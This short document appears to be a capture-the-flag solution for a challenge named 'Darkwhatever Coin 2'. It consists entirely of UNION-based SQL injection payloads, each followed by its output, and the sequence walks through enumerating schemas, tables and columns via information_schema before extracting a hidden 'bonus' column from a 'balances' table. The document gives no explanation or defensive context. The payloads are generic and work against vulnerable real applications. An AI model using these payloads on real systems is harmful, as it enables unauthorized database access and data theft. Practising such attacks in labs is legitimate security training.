Darkwhatever Coin 2
- Schema names
' UNION SELECT SCHEMA_NAME, NULL FROM information_schema.schemata #
information_schema
q2
- Table names
' UNION SELECT TABLE_NAME, NULL FROM information_schema.tables WHERE TABLE_SCHEMA = 'q2' #
balances
- Column names
' UNION SELECT COLUMN_NAME, NULL FROM information_schema.columns WHERE TABLE_SCHEMA = 'q2' #
id
teamname
balance
bonus
- Bonus column
' UNION SELECT NULL, bonus FROM balances #